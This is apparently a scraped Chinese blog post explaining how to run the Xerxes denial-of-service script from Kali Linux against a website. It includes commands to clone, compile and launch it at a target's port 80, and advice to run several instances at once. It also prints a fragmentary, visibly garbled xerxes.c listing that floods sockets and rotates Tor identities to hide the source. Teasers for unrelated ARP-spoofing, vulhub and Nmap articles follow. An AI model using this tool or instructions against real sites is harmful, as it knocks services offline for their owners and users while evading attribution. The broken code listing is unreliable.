kali下Xerxes指令碼實現DDOS攻擊

2021-09-20 05:23:15 字數 1427 閱讀 1198

1、

cd /tmp

git clone

cd xerxes

gcc xerxes.c -o xerxes

./xerxes 目標**,www開頭 埠,一般是80

#如果感覺效果不是很明顯,可以多開幾個視窗跑一樣的內容。

檢測**是否down掉了。把要檢測**粘入即可。

示例指令碼xerxes.c:

/* xerxes - most powerful dos tool - #sj edited by mr.thg */

#include #include #include #include #include #include #include #include #include #include #include int make_socket(char *host, char *port)

for(p = servinfo; p != null; p = p->ai_next)

if(connect(sock, p->ai_addr, p->ai_addrlen)==-1)

break;

}if(p == null)

if(servinfo)

freeaddrinfo(servinfo);

fprintf(stderr, "[connected -> %s:%s]\n", host, port);

return sock;}

void broke(int s)

#define connections 8

#define threads 48

void attack(char *host, char *port, int id) else

// fprintf(stderr, "socket[%i->%i] -> %i\n", x, sockets[x], r);

fprintf(stderr, "[%i: packet sent]\n", id);

}fprintf(stderr, "[%i: packet sent]\n", id);

usleep(300000);

}} void cycle_identity() {

int r;

int socket = make_socket("localhost", "9050");

write(socket, "authenticate \"\"\n", 16);

while(1) {

r=write(socket, "signal newnym\n\x00", 16);

fprintf(stderr, "[%i: cycle_identity -> signal newnym\n", r);

usleep(300000);

Kali 下的 ARP斷網實驗實現過程

位址解析協議是建立在網路中各個主機互相信任的基礎上的,網路上的主機可以自主傳送arp應答訊息,其他主機收到應答報文時 不會檢測該報文的真實性 就會將其記入本機arp快取 由此攻擊者就可以向某一主機傳送偽arp應答報文,使其傳送的資訊無法到達預期的主機或到達錯誤的主機,這就構成了乙個arp欺騙 ifc...

kali下vulhub的使用

sudo service docker start 啟動docker服務cd ls 命令進入目標檔案下 本次例項 vulhub activemq cve 2016 3088 執行命令 docker compose up d 推薦 或者 docker compose build 編譯環境啟動容器ps ...

kali基於指令碼的掃瞄工具 Nmap

kali系統在 usr share nmap scripts 裡放著各種掃瞄指令碼 說下幾種常用的掃瞄指令碼型別 漏洞利用 vuln 許可權驗證 auth 暴力破解 brute 服務資訊發現 discovery dos攻擊 dos 當然還有很多。使用命令 nmap script 指令碼名稱 引數 目...